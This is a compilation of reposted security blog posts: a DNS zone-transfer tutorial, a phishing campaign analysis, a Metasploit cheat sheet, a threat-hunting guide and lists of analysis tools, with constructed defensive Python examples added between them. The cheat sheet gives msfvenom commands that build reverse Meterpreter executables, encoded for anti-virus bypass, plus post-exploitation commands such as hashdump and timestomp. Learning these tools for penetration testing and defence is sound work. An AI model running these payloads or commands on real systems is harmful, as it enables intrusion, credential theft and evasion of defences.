Information Gathering: DNS Enumeration and Zone Transfer with Nslookup, Host, Dnsrecon, Dnsenum, Fierce, NSE and whois


– Layout for this exercise:

1 – Introduction

– DNS servers are some of the best sources for gathering information about a domain or an organization.

– An authoritative DNS server holds the name and mail records for a domain and decides what is returned when public requests arrive from the Internet.

– Because of the abundant and interesting information held in DNS servers, DNS enumeration is one of the most critical steps when gathering information about a target.

– DNS Zone Transfer, also sometimes known by the inducing DNS query type AXFR, is a type of DNS transaction.

– DNS Zone Transfer is one of the many mechanisms available for administrators to replicate DNS databases across a set of DNS servers.

– A zone transfer uses the Transmission Control Protocol (TCP) for transport, and takes the form of a client–server transaction.

– The client requesting a zone transfer may be a slave server or secondary server, requesting data from a master server, sometimes called a primary server.

– The portion of the database containing the list of all DNS names is the zone file.

– The data contained in a DNS zone may be sensitive from an operational security aspect.

– This is because information such as server hostnames may become public knowledge, which can be used to discover information about an organization and even provide a larger attack surface.

2 – nslookup

– nslookup is a popular tool that queries Internet name servers and mail servers for a given domain:

– Applying the NS query option for name servers:

– Applying the MX query option for mail servers:

– Applying the ANY query option for both name and mail servers:

3 – host 

– host is a Linux command that performs powerful DNS lookups given a domain name:

– Without any other parameter host provides help:

– Looking for name servers (-t type ns):

– Looking for email servers (-t type mx):

– Looking for web servers (-t type www):

4 – DNS Zone Transfer with host

– Now, let’s use host for a slightly more complicated task: a DNS zone transfer.

– First, let’s try with the previously enumerated ns1 name server. The zone transfer fails:

– However, the zone transfer with ns2 is successful:

– Finally, the zone transfer with ns3 also fails:

– The result of the successful DNS zone transfer with ns2 is a full dump of the zone file for the whole domain, giving us a list of IPs and their corresponding DNS names.

– Let’s try entering into a browser some of the IPs obtained from the DNS Zone Transfer:
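The zone dump above is only useful once it is turned into a list of hostnames and addresses, and an administrator auditing their own domain wants to know which of the authoritative servers answered the AXFR at all. The following Python script is an added example, not code from the original post: it parses the text that host -l prints for each server, reports which servers leaked the zone and how many hosts were exposed, and can drive the real host binary through audit_zone. Everything in it is constructed: example.com, ns1 to ns3, the 192.0.2.x addresses and 2001:db8::25 are documentation ranges, not real hosts, and run_host and canned_runner are names chosen here.

```python
"""Parse the output of ``host -l <zone> <server>`` (one AXFR attempt) and
summarise which name servers leak the zone.

Added example, not code from the original post. Everything below is constructed:
example.com, ns1-ns3 and the 192.0.2.x / 2001:db8:: addresses are documentation
ranges (RFC 5737 / RFC 3849), not real hosts.
"""
import re
import subprocess
from dataclasses import dataclass, field

# Record lines printed by host -l, e.g.
#   www.example.com has address 192.0.2.11
#   mail.example.com has IPv6 address 2001:db8::25
#   example.com name server ns2.example.com.
ADDRESS_RE = re.compile(r"^(?P<name>\S+) has (?:IPv6 )?address (?P<addr>\S+)$")
NS_RE = re.compile(r"^(?P<zone>\S+) name server (?P<ns>\S+)$")
# Fragments host prints when the server does not allow the transfer.
FAILURE_MARKERS = ("Transfer failed", "REFUSED", "not found", "connection refused")


@dataclass
class ZoneTransferResult:
    server: str
    allowed: bool = False
    records: dict = field(default_factory=dict)       # hostname -> [addresses]
    name_servers: list = field(default_factory=list)


def parse_host_output(server: str, output: str) -> ZoneTransferResult:
    """Turn the raw text of one AXFR attempt into a structured result."""
    result = ZoneTransferResult(server=server)
    for raw in output.splitlines():
        line = raw.strip()
        if any(marker in line for marker in FAILURE_MARKERS):
            return ZoneTransferResult(server=server, allowed=False)
        m = ADDRESS_RE.match(line)
        if m:
            result.records.setdefault(m.group("name"), []).append(m.group("addr"))
            continue
        m = NS_RE.match(line)
        if m:
            result.name_servers.append(m.group("ns").rstrip("."))
    # Any record at all means the server answered the AXFR.
    result.allowed = bool(result.records or result.name_servers)
    return result


def summarise(results):
    """Which servers leaked the zone, and how many hosts were exposed."""
    exposed = {}
    for r in results:
        for name, addrs in r.records.items():
            exposed.setdefault(name, set()).update(addrs)
    return {
        "leaking_servers": [r.server for r in results if r.allowed],
        "hosts_exposed": len(exposed),
        "hosts": {name: sorted(addrs) for name, addrs in sorted(exposed.items())},
    }


def run_host(zone: str, server: str) -> str:
    """Default runner: invoke the real host binary (needs network and host installed)."""
    proc = subprocess.run(["host", "-l", zone, server],
                          capture_output=True, text=True, timeout=30)
    return proc.stdout + proc.stderr


def audit_zone(zone: str, servers, runner=run_host):
    """Try AXFR against every authoritative server of a zone you administer.
    `runner` is injectable so the parser can be exercised on canned output."""
    return summarise([parse_host_output(s, runner(zone, s)) for s in servers])


# Constructed sample output, modelled on what host -l prints.
SAMPLE_REFUSED = """Using domain server:
Name: ns1.example.com
Address: 192.0.2.1#53
Aliases:

; Transfer failed.
"""

SAMPLE_OK = """Using domain server:
Name: ns2.example.com
Address: 192.0.2.2#53
Aliases:

example.com name server ns1.example.com.
example.com name server ns2.example.com.
example.com name server ns3.example.com.
example.com has address 192.0.2.10
www.example.com has address 192.0.2.11
mail.example.com has address 192.0.2.20
mail.example.com has IPv6 address 2001:db8::25
intranet.example.com has address 192.0.2.30
"""

CANNED = {"ns2.example.com": SAMPLE_OK}


def canned_runner(zone, server):
    """Stand-in for run_host: only ns2 answers the transfer in this sample."""
    return CANNED.get(server, SAMPLE_REFUSED)


if __name__ == "__main__":
    report = audit_zone("example.com",
                        ["ns1.example.com", "ns2.example.com", "ns3.example.com"],
                        runner=canned_runner)
    print(report)
```

Run against the canned output the report names ns2 as the only leaking server and counts four exposed hosts, mirroring the ns1/ns2/ns3 results in the screenshots; with the default runner it does the same against a zone you operate, which is the quickest way to confirm that allow-transfer on each secondary is limited to the intended peers.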

5 – dnsrecon

– dnsrecon is an automated tool, a Python script, that can be used for DNS enumeration.

– Let’s check that the information provided by dnsrecon matches what we obtained before.

– First, dnsrecon detects the DNS servers ns1, ns2 and ns3:

– Then, dnsrecon performs a successful DNS zone transfer with ns2:

– dnsrecon also tries a DNS zone transfer against ns1 and ns3, with no result:

6 – dnsenum

– dnsenum is a multithreaded Perl script to enumerate DNS information of a domain.

– The output obtained with dnsenum is the same as before:

7 – fierce

– fierce is a Perl-based script for DNS enumeration. The results obtained with fierce are very similar to the previous ones:

8 – Nmap Scripting Engine (NSE)

– The Nmap Scripting Engine (NSE) is an addition to Nmap that provides users with scripts to automate a variety of tasks:

– The NSE dns-zone-transfer script provides the same output as before:

– A somewhat more limited result, since it only finds a list of common subdomains, is obtained with the NSE dns-brute script:

9 – whois 

– whois is a query and response protocol that is widely used for querying databases that store the registered users of an Internet resource, such as a domain name, an IP address block, or an autonomous system.

– Looking for the domain:

Original Post: 

Behind the Scene: Microsoft Phishing Campaign Analysis

The technique used in this phishing campaign drew my attention and warranted further analysis.

The phishing email spoofs Microsoft support to trick the user into clicking the phishing URL.


Track down on the email header:

Received: from holla (ZeMUxqZXZhgrTP0ikgiWW1o4dTNLMAF5sRFeLlEyBa8wsHdKyqFyHV85oz34oJZQ6M@[]) by

The sender machine is on Microsoft Azure, likely a compromised machine.

That compromised machine has 44 open ports, all of them serving HTTP.

A non-UTF-8 character is inserted between "Office" and "365" to fool spam email detection.
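A keyword filter that looks for "Office 365" literally never sees the subject above, because an extra code point sits inside the brand term. The following Python script is an added example, not part of the original analysis: it strips invisible format characters, maps a small hand-picked set of Cyrillic/Greek look-alikes to Latin, folds the result to ASCII, and flags any brand term that matches only after folding as deliberately obscured. The subject lines and the CONFUSABLES table are constructed; a production filter would use the full Unicode TR39 confusables data rather than this subset.

```python
"""Spot brand keywords hidden from naive filters by invisible or look-alike
characters (the "Office 365" trick described above).

Added example, not part of the original analysis. The subject lines and the
small CONFUSABLES table are constructed; a production filter would use the full
Unicode TR39 confusables data instead of this hand-picked subset.
"""
import re
import unicodedata

# Brand terms a phishing filter cares about, matched on the normalised subject.
BRAND_PATTERNS = [re.compile(p, re.IGNORECASE)
                  for p in (r"office\s*365", r"microsoft", r"outlook", r"sharepoint")]

# Hand-picked Cyrillic/Greek letters that render like Latin ones (assumed subset).
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0456": "i", "\u0455": "s", "\u0445": "x", "\u03bf": "o", "\u0391": "A",
    "\u041e": "O", "\u0415": "E", "\u0421": "C",
}


def strip_invisible(text: str) -> str:
    """Drop control/format characters: zero-width space, soft hyphen, BOM, RTL marks."""
    return "".join(ch for ch in text if not unicodedata.category(ch).startswith("C"))


def fold_to_ascii(text: str) -> str:
    """Map known look-alikes, NFKD-decompose (fullwidth letters, accented letters),
    then keep only the ASCII part."""
    mapped = "".join(CONFUSABLES.get(ch, ch) for ch in text)
    decomposed = unicodedata.normalize("NFKD", mapped)
    return "".join(ch for ch in decomposed if ch.isascii())


def hidden_characters(text: str):
    """List the non-ASCII or invisible code points, for the analyst's report."""
    return [f"U+{ord(ch):04X} {unicodedata.name(ch, 'UNKNOWN')}"
            for ch in text
            if not ch.isascii() or unicodedata.category(ch).startswith("C")]


def analyse_subject(subject: str) -> dict:
    """Compare brand matches on the raw subject with matches on the folded one.
    A term that appears only after folding was deliberately obscured."""
    folded = fold_to_ascii(strip_invisible(subject))
    raw_hits = [p.pattern for p in BRAND_PATTERNS if p.search(subject)]
    folded_hits = [p.pattern for p in BRAND_PATTERNS if p.search(folded)]
    evasive = [p for p in folded_hits if p not in raw_hits]
    return {
        "folded": folded,
        "hidden_chars": hidden_characters(subject),
        "brand_hits": folded_hits,
        "evasive_hits": evasive,
        "suspicious": bool(evasive),
    }


# Constructed subject lines: one clean, one with a zero-width space inside
# "Office 365", one with a Cyrillic 'o' inside "Microsoft".
SAMPLE_SUBJECTS = [
    "Team lunch on Friday",
    "Your Office\u200b365 password expires today",
    "Micr\u043esoft account alert: unusual sign-in",
]

if __name__ == "__main__":
    for s in SAMPLE_SUBJECTS:
        r = analyse_subject(s)
        print(f"{r['suspicious']!s:5} {s!r} -> {r['evasive_hits']} {r['hidden_chars']}")
```

The useful signal is the difference between the two match sets: a legitimate "Office 365 billing notice" matches both before and after folding and is not flagged, while a subject that only matches after folding carries a character someone put there to defeat the filter. The hidden_chars list gives the analyst the exact code points to cite in the report.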


Instead of an HTTP redirect, the campaign uses a JavaScript redirection to bypass URL checking by major email-protection vendors.


The phishing sites are hosted on dynamic DNS domains.


The Office 365 phishing site looks exactly the same as Microsoft Office 365 login page.


The phishing site is hosted by a hosting provider in Russia.


Microsoft Safe Link Protection is able to detect the phishing site before the Javascript redirection.


Metasploit Cheat Sheet

The Metasploit Project is a computer security project that provides information on vulnerabilities, helping in the development of penetration tests and IDS signatures.
Metasploit is a popular tool used by pentest experts.


Metasploit:

Search for module:

msf > search [regex]

Specify an exploit to use:

msf > use exploit/[ExploitPath]

Specify a Payload to use:

msf > set PAYLOAD [PayloadPath]

Show options for the current module:

msf > show options

Set options:

msf > set [Option] [Value]

Start exploit:

msf > exploit

Useful Auxiliary Modules

Port Scanner:

msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS
msf > run

DNS Enumeration:

msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > run

FTP Server:

msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run

Proxy Server:

msf > use auxiliary/server/socks4
msf > run 

msfvenom:
The msfvenom tool can be used to generate Metasploit payloads (such as Meterpreter) as standalone files and optionally encode them. This tool replaces the former msfpayload and msfencode tools. Run with ‘-l payloads’ to get a list of payloads.

$ msfvenom -p [PayloadPath] -f [FormatType] LHOST=[LocalHost (if reverse conn.)]

Example :
Reverse Meterpreter payload as an executable and redirected into a file:

$ msfvenom -p windows/meterpreter/reverse_tcp -f exe LHOST= LPORT=4444 > met.exe

Format Options (specified with -f):
--help-formats – List available output formats
exe – Executable
pl – Perl
rb – Ruby
raw – Raw shellcode
c – C code
Encoding Payloads with msfvenom
The msfvenom tool can be used to apply a level of encoding for anti-virus bypass. Run with ‘-l encoders’ to get a list of encoders.

$ msfvenom -p [Payload] -e [Encoder] -f [FormatType] -i [EncodeIterations] LHOST=[LocalHost (if reverse conn.)]

Encode a payload 5 times using the shikata_ga_nai encoder and output it as an executable:

$ msfvenom -p windows/meterpreter/reverse_tcp -i 5 -e x86/shikata_ga_nai -f exe LHOST= LPORT=4444 > mal.exe

Metasploit Meterpreter

Base Commands:
? / help: Display a summary of commands
exit / quit: Exit the Meterpreter session
sysinfo: Show the system name and OS type
shutdown / reboot: Self-explanatory
File System Commands:
cd: Change directory
lcd: Change directory on local (attacker’s) machine
pwd / getwd: Display current working directory
ls: Show the contents of the directory
cat: Display the contents of a file on screen
download / upload: Move files to/from the target machine
mkdir / rmdir: Make / remove directory
edit: Open a file in the default editor (typically vi)
Process Commands:
getpid: Display the process ID that Meterpreter is running inside.
getuid: Display the user ID that Meterpreter is running with.
ps: Display process list.
kill: Terminate a process given its process ID.
execute: Run a given program with the privileges of the process the Meterpreter is loaded in.
migrate: Jump to a given destination process ID

  • Target process must have same or lesser privileges
  • Target process may be a more stable process
  • When inside a process, can access any files that process has a lock on.

Network Commands:
ipconfig: Show network interface information
portfwd: Forward packets through TCP session
route: Manage/view the system’s routing table

Misc Commands:
idletime: Display the duration that the GUI of the target machine has been idle.
uictl [enable/disable] [keyboard/mouse]: Enable/disable either the mouse or keyboard of the target machine.
screenshot: Save as an image a screenshot of the target machine.

Additional Modules:
use [module]: Load the specified module
use priv: Load the priv module
hashdump: Dump the hashes from the box
timestomp: Alter NTFS file timestamps

Managing Sessions

Multiple Exploitation:
Run the exploit expecting a single session that is immediately backgrounded:

msf > exploit -z

Run the exploit in the background expecting one or more sessions that are immediately backgrounded:

msf > exploit -j

List all current jobs (usually exploit listeners):

msf > jobs -l

Kill a job:

msf > jobs -k [JobID]

Multiple Sessions:

List all backgrounded sessions:

msf > sessions -l

Interact with a backgrounded session:

msf > sessions -i [SessionID]

Background the current interactive session:

meterpreter > <Ctrl+Z>
meterpreter > background

Routing Through Sessions:
All modules (exploit/post/auxiliary) run against the target subnet will be pivoted through this session.

msf > route add [Subnet to Route To] [Subnet Netmask] [SessionID]


Original post:

Threat Hunting for Non-Hunters

Threat hunting is a proactive task that assumes your organization has already been breached and aims to beat the average “dwell time” of 256 days; at least that is how I see it as a DFIR practitioner. It is usually done with the help of different tools that we call “arsenals”, mostly SIEM (security information and event management) and EDR (endpoint detection and response).

However, security is not just for the IT security folks who are paid to do this kind of “Blue Team” work (aka incident responders); it is everyone’s responsibility.

Humans are the weakest link in the security chain, so as an end user anyone should have a basic understanding of how to find malicious activity and files on their workstation.

Malware, or malicious software, includes but is not limited to keyloggers, credential stealers, crypto miners, reverse shells, ransomware, botnets, and more.

This article aims to give non-security folks a portion of the technical knowledge needed to hunt threats on their Windows systems, and to share it with their families and friends, using tools freely available for download from the Internet.

Hunting Persistent Threat with Autorun Programs

There are many places in a system where an adversary can plant malicious programs that run automatically at boot time without the end user’s awareness.

Two tools from Microsoft’s Sysinternals Suite, “autorunsc.exe” (command line) and “Autoruns.exe” (graphical user interface), show all autorun programs on your machine; they can be downloaded from the link below.

Download URL:

Adding the parameter “hyphen h” (-h) to the autorunsc.exe command gives you the MD5 or SHA-256 hashes of each file, which you can check against VirusTotal, an Open Source Intelligence (OSINT) website for malicious files and URLs.


autorunsc.exe -h

The output can also be redirected to a text file for reference and easy recording.


autorunsc.exe -h > autoruns.txt

“autorunsc.exe -help” will give you more options to play around with in the command-line tool on Windows.

More often, the graphical version of Autoruns is preferable, as a simple right-click gives you an option to check the program on VirusTotal on the spot.

Threat Hunting Hidden Processes

Anti-virus (AV), whether traditional or self-described “Next-Gen AV”, misses more than 70% of malware according to research, because it is still signature-based. Sophisticated malicious programs run as hidden processes to evade AV detection.

The most common malware of this kind is the “rootkit”, a malicious program that runs in the system’s kernel or memory.

Below are useful tools that can be used against this persistent threat on anyone’s PC.


GMER is an awesome tool in detecting rogue processes that can be downloaded here:

This is a PE (portable executable) tool, like the Sysinternals Suite and the other tools mentioned here.

With the aid of procexp64.exe from the Sysinternals Suite (for 64-bit Windows systems), the tool was found spawning various DLLs and processes, which were also identified as malicious based on the Indicators of Compromise (IOCs) found on VirusTotal.

Threat Hunting Command & Control

Command & Control (C2 or C&C) is a server that gives directives to devices, commonly computers and smartphones, that have been infected with a rootkit or with malware such as ransomware and other variants. These infected devices are called “bots” (short for robot), and a group of them a “botnet”. Botnets are also used for sending spam and for Distributed Denial of Service (DDoS) attacks against a target.

Known C2 servers will most likely be detected by the firewall if it is enabled on a PC or company-provided workstation, except in a “zero day” attack, when the C2 server is not yet known to the EDR and firewall vendors.

This may sound a little technical, but it is good to know, since the tool used as an example here is already included in Windows.

By opening the command prompt (CMD) as administrator, you can run the tool called NETSTAT.

In the command prompt, type the command below with the “ano” parameters (-ano) to display all network connections with port numbers and process IDs. The “f” parameter is useful for seeing the fully qualified domain name (simply, the website address) of the established Internet connections, for quick identification.


netstat -ano

netstat -af

The tool will print a number of lines, depending on how many browser tabs are open while connected to the Internet, and it will also include the connection to the C&C if the host is infected with malware or is part of a botnet.

This network threat hunting process may take a few minutes, as it requires going through the public IP addresses in LISTENING and ESTABLISHED state and checking them against OSINT sources such as VirusTotal, OTX and other websites that provide IOCs based on IPs.

If no IOC is found in the OSINT sources, a healthy paranoia may still call for stopping the running process by the PID (process ID) reported by NETSTAT: open “Task Manager” by pressing CTRL+ALT+DELETE, find the PID under the Details tab, right-click it and choose “End task”.
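Reading a long netstat -ano listing by eye is where most people give up. The following Python script is an added example, not part of the original article: it parses the netstat output, lists the listening ports per process, and groups the ESTABLISHED connections whose peer lies outside the local address ranges by PID, which is exactly the set of addresses to look up on VirusTotal or OTX before deciding whether to end the owning process. The netstat text is constructed; 198.51.100.23 and 203.0.113.77 are documentation addresses standing in for real remote hosts, and the PIDs are made up.

```python
"""Parse Windows ``netstat -ano`` output and pull out what the hunt needs:
listening ports per process, and ESTABLISHED connections to addresses outside
the local network, grouped by PID for OSINT lookup.

Added example, not part of the original article. The netstat text below is
constructed; 198.51.100.23 and 203.0.113.77 are documentation addresses
(RFC 5737) standing in for real remote hosts.
"""
import ipaddress
import re
from collections import defaultdict

# Address space that is never a remote C2: RFC 1918, loopback, link-local,
# unspecified, multicast, and their IPv6 equivalents.
LOCAL_NETWORKS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "0.0.0.0/8", "224.0.0.0/4",
    "::1/128", "::/128", "fe80::/10", "fc00::/7", "ff00::/8",
)]

# One netstat row: proto, local, foreign, optional state (UDP has none), PID.
ROW_RE = re.compile(
    r"^\s*(?P<proto>TCP|UDP)\s+(?P<local>\S+)\s+(?P<remote>\S+)\s+"
    r"(?:(?P<state>[A-Z_]+)\s+)?(?P<pid>\d+)\s*$"
)


def split_endpoint(endpoint: str):
    """'192.168.1.20:49731' -> ('192.168.1.20', '49731'); '[::]:135' -> ('::', '135')."""
    host, _, port = endpoint.rpartition(":")
    return host.strip("[]"), port


def is_local(host: str) -> bool:
    """True for addresses inside LOCAL_NETWORKS. Hostnames (netstat -f output)
    cannot be classified and are treated as remote so they are not silently dropped."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False
    return any(ip in net for net in LOCAL_NETWORKS)


def parse_netstat(text: str):
    """Return one dict per connection row; header and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue
        rows.append({
            "proto": m.group("proto"),
            "local": split_endpoint(m.group("local")),
            "remote": split_endpoint(m.group("remote")),
            "state": m.group("state") or "",
            "pid": int(m.group("pid")),
        })
    return rows


def listening_ports(rows):
    """(proto, port, pid) for every TCP listener and bound UDP socket."""
    return sorted({(r["proto"], r["local"][1], r["pid"]) for r in rows
                   if r["state"] == "LISTENING" or r["proto"] == "UDP"})


def external_connections(rows):
    """ESTABLISHED connections whose peer is outside the local ranges, by PID.
    These are the addresses to check against VirusTotal / OTX before deciding
    whether the owning process needs to be ended."""
    by_pid = defaultdict(set)
    for r in rows:
        host, port = r["remote"]
        if r["state"] != "ESTABLISHED" or host in ("*", "") or is_local(host):
            continue
        by_pid[r["pid"]].add(f"{host}:{port}")
    return {pid: sorted(peers) for pid, peers in by_pid.items()}


# Constructed netstat -ano output. PID 6620 is the kind of row worth a second
# look: an established session to an unfamiliar address on an unusual port.
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    192.168.1.20:49731     198.51.100.23:443      ESTABLISHED     4312
  TCP    192.168.1.20:49812     203.0.113.77:4444      ESTABLISHED     6620
  TCP    192.168.1.20:49900     10.0.0.5:445           ESTABLISHED     4
  TCP    [::]:445               [::]:0                 LISTENING       4
  UDP    0.0.0.0:5353           *:*                                    2280
"""

if __name__ == "__main__":
    rows = parse_netstat(SAMPLE_NETSTAT)
    print("listening:", listening_ports(rows))
    print("external established:", external_connections(rows))
```

The local-range filter is deliberately a hand-written list rather than ipaddress.is_private, because the documentation ranges used in the sample are classed as reserved by the standard library and would otherwise disappear from the report. On a real workstation, redirect the netstat output to a file and feed that file to parse_netstat.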

Threat Hunting Malware

Threat hunting for malicious programs is different from running an anti-virus, as the program does not need to be quarantined or removed immediately. Running an AV may notify the malware creator that the malicious program planted on the host has been found and deleted, warning the adversary of the detection.

“Triaging” an advanced persistent threat (APT) is crucial in hunting the threat actor and tracing their whereabouts.

A simple IOC scanner called LOKI is effective for this detective role, playing Sherlock Holmes.

This slick tool can be downloaded here:

The tool gives the full directory path of both suspicious and malicious files, based on IOCs that most AVs do not yet have; you may then delete them manually or opt for further malware analysis, which is an interesting hobby.

Threat Hunting Rogue Wi-Fi

In my few speaking engagements, I always mention that “free” is not always good, as it can be a conduit for social engineering attacks like Man-in-the-Middle (MITM) or eavesdropping techniques to steal sensitive information.

It is best to have a healthy paranoia and run tools like my example here to catch rogue access points (APs) in public.

A handy, user-friendly rogue AP killer called CHELLAM is very useful for staying safe in the wild, while the adversary is just one click away from baiting their targets, and one could be you or your family.


There are many tools available for download in the wild, and it is everyone’s discretion which tool is effective for them. As mentioned in my other blogs, the mindset of a hunter is the most important thing, and that cannot be taken from classroom training nor from a Ph.D. degree. Again, security is everybody’s responsibility: either you are part of the solution or just another brick in the wall.

Original Post:

The AWS Security Open Source Toolkit


I love AWS. I love Open Source. I love Security. So I’ve been bringing together a compilation of the best tools available to monitor, audit, train up on and find exposures in your AWS accounts.

You can find the GitHub repo here;

Please add to that if you wish!


Generate a report of all S3 buckets for an account:

Find open S3 buckets:

Generate Network Diagrams:

Cred Scanner:

Disable Access Keys after X days:

Secrets Management:

Least Privilege:

Resource Counter:

IAM Access Advisor:

Policy changes & Insecure config:

Policy & Encryption:

AWS Attack Library:

Thanks to all the awesome open-sourcers who make these possible!

Original Post:

Most Important Security Tools and Resources For Security Researcher, Malware Analyst, Reverse Engineer

Important Tools and Resources

Security professionals always need to learn many tools, techniques and concepts to analyze sophisticated threats and current cyber attacks.

Here we look at some of the most important tools, books and resources used mainly for malware analysis and reverse engineering.

Hex Editors

A hex editor (or binary file editor or byte editor) is a type of computer program that allows manipulation of the fundamental binary data that constitutes a computer file. The name ‘hex’ comes from ‘hexadecimal’: a standard numerical format for representing binary data.


A disassembler is a computer program that translates machine language into assembly language, the inverse operation to that of an assembler.

A disassembler differs from a decompiler, which targets a high-level language rather than an assembly language. Disassembly, the output of a disassembler, is often formatted for human-readability rather than suitability for input to an assembler, making it principally a reverse-engineering tool.

Detection and Classification

  • AnalyzePE – Wrapper for a variety of tools for reporting on Windows PE files.
  • Assemblyline – A scalable distributed file analysis framework.
  • BinaryAlert – An open source, serverless AWS pipeline that scans and alerts on uploaded files based on a set of YARA rules.
  • chkrootkit – Local Linux rootkit detection.
  • ClamAV – Open source antivirus engine.
  • Detect-It-Easy – A program for determining types of files.
  • ExifTool – Read, write and edit file metadata.
  • File Scanning Framework – Modular, recursive file scanning solution.
  • hashdeep – Compute digest hashes with a variety of algorithms.
  • Loki – Host based scanner for IOCs.
  • Malfunction – Catalog and compare malware at a function level.
  • MASTIFF – Static analysis framework.
  • MultiScanner – Modular file scanning/analysis framework
  • nsrllookup – A tool for looking up hashes in NIST’s National Software Reference Library database.
  • packerid – A cross-platform Python alternative to PEiD.
  • PEV – A multiplatform toolkit to work with PE files, providing feature-rich tools for proper analysis of suspicious binaries.
  • Rootkit Hunter – Detect Linux rootkits.
  • ssdeep – Compute fuzzy hashes.
  • – Python script for easy searching of the database.
  • TrID – File identifier.
  • YARA – Pattern matching tool for analysts.
  • Yara rules generator – Generate yara rules based on a set of malware samples. Also contains a good strings DB to avoid false positives

Dynamic Binary Instrumentation

Dynamic Analysis

This introductory malware dynamic analysis class is dedicated to people who are starting to work on malware analysis or who want to know what kinds of artifacts left by malware can be detected via various tools.

The class will be a hands-on class where students can use various tools to look for how malware is: Persisting, Communicating, and Hiding


Reverse XOR and other code obfuscation methods.

  • Balbuzard – A malware analysis tool for reversing obfuscation (XOR, ROL, etc) and more.
  • de4dot – .NET deobfuscator and unpacker.
  • ex_pe_xor & iheartxor – Two tools from Alexander Hanel for working with single-byte XOR encoded files.
  • FLOSS – The FireEye Labs Obfuscated String Solver uses advanced static analysis techniques to automatically deobfuscate strings from malware binaries.
  • NoMoreXOR – Guess a 256 byte XOR key using frequency analysis.
  • PackerAttacker – A generic hidden code extractor for Windows malware.
  • unpacker – Automated malware unpacker for Windows malware based on WinAppDbg.
  • unxor – Guess XOR keys using known-plaintext attacks.
  • VirtualDeobfuscator – Reverse engineering tool for virtualization wrappers.
  • XORBruteForcer – A Python script for brute forcing single-byte XOR keys.
  • XORSearch & XORStrings – A couple programs from Didier Stevens for finding XORed data.
  • xortool – Guess XOR key length, as well as the key itself.


This list covers disassemblers, debuggers, and other static and dynamic analysis tools.

  • angr – Platform-agnostic binary analysis framework developed at UCSB’s Seclab.
  • bamfdetect – Identifies and extracts information from bots and other malware.
  • BAP – Multiplatform and open source (MIT) binary analysis framework developed at CMU’s Cylab.
  • BARF – Multiplatform, open source Binary Analysis and Reverse engineering Framework.
  • binnavi – Binary analysis IDE for reverse engineering based on graph visualization.
  • Binary ninja – A reversing engineering platform that is an alternative to IDA.
  • Binwalk – Firmware analysis tool.
  • Bokken – GUI for Pyew and Radare. (mirror)
  • Capstone – Disassembly framework for binary analysis and reversing, with support for many architectures and bindings in several languages.
  • codebro – Web based code browser using clang to provide basic code analysis.
  • DECAF (Dynamic Executable Code Analysis Framework) – A binary analysis platform based on QEMU. DroidScope is now an extension to DECAF.
  • dnSpy – .NET assembly editor, decompiler and debugger.
  • Evan’s Debugger (EDB) – A modular debugger with a Qt GUI.
  • Fibratus – Tool for exploration and tracing of the Windows kernel.
  • FPort – Reports open TCP/IP and UDP ports in a live system and maps them to the owning application.
  • GDB – The GNU debugger.
  • GEF – GDB Enhanced Features, for exploiters and reverse engineers.
  • hackers-grep – A utility to search for strings in PE executables including imports, exports, and debug symbols.
  • Hopper – The macOS and Linux Disassembler.
  • IDA Pro – Windows disassembler and debugger, with a free evaluation version.
  • Immunity Debugger – Debugger for malware analysis and more, with a Python API.
  • ILSpy – ILSpy is the open-source .NET assembly browser and decompiler.
  • Kaitai Struct – DSL for file formats / network protocols / data structures reverse engineering and dissection, with code generation for C++, C#, Java, JavaScript, Perl, PHP, Python, Ruby.
  • LIEF – LIEF provides a cross-platform library to parse, modify and abstract ELF, PE and MachO formats.
  • ltrace – Dynamic analysis for Linux executables.
  • objdump – Part of GNU binutils, for static analysis of Linux binaries.
  • OllyDbg – An assembly-level debugger for Windows executables.
  • PANDA – Platform for Architecture-Neutral Dynamic Analysis.
  • PEDA – Python Exploit Development Assistance for GDB, an enhanced display with added commands.
  • pestudio – Perform static analysis of Windows executables.
  • Pharos – The Pharos binary analysis framework can be used to perform automated static analysis of binaries.
  • plasma – Interactive disassembler for x86/ARM/MIPS.
  • PPEE (puppy) – A Professional PE file Explorer for reversers, malware researchers and those who want to statically inspect PE files in more detail.
  • Process Explorer – Advanced task manager for Windows.
  • Process Hacker – Tool that monitors system resources.
  • Process Monitor – Advanced monitoring tool for Windows programs.
  • PSTools – Windows command-line tools that help manage and investigate live systems.
  • Pyew – Python tool for malware analysis.
  • PyREBox – Python scriptable reverse engineering sandbox by the Talos team at Cisco.
  • QKD – QEMU with embedded WinDbg server for stealth debugging.
  • Radare2 – Reverse engineering framework, with debugger support.
  • RegShot – Registry compare utility that compares snapshots.
  • RetDec – Retargetable machine-code decompiler with an online decompilation service and API that you can use in your tools.
  • ROPMEMU – A framework to analyze, dissect and decompile complex code-reuse attacks.
  • SMRT – Sublime Malware Research Tool, a plugin for Sublime 3 to aid with malware analysis.
  • strace – Dynamic analysis for Linux executables.
  • Triton – A dynamic binary analysis (DBA) framework.
  • Udis86 – Disassembler library and tool for x86 and x86_64.
  • Vivisect – Python tool for malware analysis.
  • WinDbg – multipurpose debugger for the Microsoft Windows computer operating system, used to debug user mode applications, device drivers, and the kernel-mode memory dumps.
  • X64dbg – An open-source x64/x32 debugger for windows.

Binary Format and  Binary Analysis

The Compound File Binary Format is the basic container used by several different Microsoft file formats such as Microsoft Office documents and Microsoft Installer packages.


A decompiler is a computer program that takes an executable file as input, and attempts to create a high level source file which can be recompiled successfully. It is therefore the opposite of a compiler, which takes a source file and makes an executable.

Online Scanners and Sandboxes

The following are web-based multi-AV scanners and malware sandboxes for automated analysis.

  • – Online sandbox.
  • AndroTotal – Free online analysis of APKs against multiple mobile antivirus apps.
  • AVCaesar – online scanner and malware repository.
  • Cryptam – Analyze suspicious office documents.
  • Cuckoo Sandbox – Open source, self hosted sandbox and automated analysis system.
  • cuckoo-modified – Modified version of Cuckoo Sandbox released under the GPL. Not merged upstream due to legal concerns by the author.
